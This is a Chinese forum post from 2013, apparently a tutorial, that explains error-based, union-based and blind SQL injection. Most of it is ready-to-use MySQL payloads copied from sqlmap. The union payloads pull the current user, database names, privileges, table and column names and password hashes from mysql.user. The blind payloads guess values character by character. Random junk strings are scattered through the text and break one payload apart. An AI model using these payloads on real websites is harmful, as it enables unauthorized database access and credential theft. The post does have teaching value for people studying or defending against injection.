放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。1 O0 a# V4 d- x) j% |0 u
) l d! Y- @2 C6 \
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
! S; d" s. O+ |" }( G 1 I* _% z3 J9 @: x* |3 u& X" Z
分类标准 分类 备注/ C7 ~* Y7 \, F, K: e% b0 R
按字段类型 整型注入,字符型注入 + R: b0 y% r3 A3 W
按出现的位置 get注入,post注入,cookie注入,http header注入 ! E# s4 b0 j, B" D+ [- s5 X1 r" p
然而高级注入是这样的
; {/ y0 \" I+ [4 D: Z. G" T, E! | ) N5 r. o5 o/ v F( W3 G6 C
高级注入分类 条件
. N+ S4 i0 Q# F0 I, T9 Z6 i: Xerror-based sql 数据库的错误回显可以返回,存在数据库,表结构9 V# [$ L+ B. t
union-based sql 能够使用union,存在数据库,表结构% O7 a# a7 O' x7 D. q7 f* n) d
blind sql 存在注入% E2 ^- [9 p g3 g ?/ T! G( ]
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
8 R* G* J# e# f" a: v* C* k1 J' g8 I
% W0 J9 I4 {* ^+ Q, ?: U' U好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火8 G& N% ]1 B3 x& }$ j9 p* @
4 ^, B; x9 l7 V# l9 J$ x& G, [+ k附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
3 _8 C0 e: _2 E% j J Z
% \$ t) K2 K$ i8 B& k' T* Q这里用mysql说明/ Z# U3 Q. |8 g8 o, o
6 X' [! @* b& _& o/ ne注入坛子里很多了,请看戳我或者再戳我0 [' d r8 p8 `% m+ X% l
( u$ N3 l; f- A, Cu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
8 H( r% K8 d; ? ( Q8 D$ }# c' D1 X0 k, S' f
获取当前数据库用户名% V* M( j3 U3 c0 ^) [, c! C
& d1 ]7 w7 ]1 K8 t5 t* rUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C$ f, M5 {1 z9 A+ S
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
$ a# x3 ?( |/ U) bL, NULL#' m a7 g/ [# W5 D( c# ?8 g
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。- H- N- j* a' J
/ R# w( V* A8 @, u
获取数据库名8 n2 x$ N2 L8 P& n5 r' v
8 N. Q" H ?# a
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
" X5 O; t3 C( Q3 [6 s获取所有用户名$ u* [4 e) y# Z. M0 R4 Q# B( ?
( d' S" S) J o" A1 b4 Q4 SUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
' P/ ]7 a4 R. @/ w$ J6 t查看当前用户权限6 X7 I7 `6 ~6 V% e7 [' r
7 @4 K/ ` J ZUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
6 N2 U {- d; a; c7 ?- Z7 h尝试获取密码,当然需要有能读mysql数据库的权限0 R+ n+ C2 H2 S& V8 W4 O
/ _' B; V8 B0 P5 O5 k
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
2 T. D% l' F i获取表名,limit什么的自己搞啦
. R( {9 y$ D- j. j* q7 z# N8 r
$ t6 C( k9 x6 V( x( z6 cUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#" z- ]* \* r$ k0 s
获取字段名及其类型- k1 h% k; m+ w* p! i; m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
% A" G/ s7 M+ x 4 M) Z k+ j1 ~3 G" _
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
* }7 S$ l/ h5 W+ {1 ? ' F2 j7 e# P: u# o3 d' ~
如:
9 }& p1 k$ k4 b: W9 y9 X- w; F获取当前用户名) ^, c1 X. H: X3 z s( d6 j
3 r( \' K0 |6 V' h6 |/ t
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116$ m( h- o- v9 i _3 `6 ~6 C
获取当前数据库5 x- Q8 U+ y& u |! J+ q
* ?7 ]# c! e0 L+ L* o- a
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
/ r: {" H2 S2 t5 L& z获取表名 G* C. S+ B% }- J9 |$ m
3 g) t5 n& u5 f- A# Z) A# v6 nAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 513 N' F* Y* n( [% `0 {' ]* o
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。3 D3 U" G: q$ U5 c6 U- u7 A
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
; y! ]: f9 h4 o6 {, V) a爆表
4 f; k7 |' `# x9 `$ w1 I . l2 k4 Y) j5 c7 P$ ?# J
AND EXISTS(select * from table)
# s# b. U6 Y" N" l, b% Z爆字段
) P$ y+ J! u( R( m+ | N" d
9 M+ c7 t9 S0 ^AND EXISTS(select pwd from table)) c% p3 J: B8 X! I
盲注的变化就比较多了,由于篇幅,只是举个例子而已。9 S2 T) W5 i0 \! |0 p+ L, W
" c" a- [; S: O0 k( \$ ~
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。5 c) W& G( y& H0 G5 [
|
发表于 2013-7-16 20:31:26
收藏
支持
反对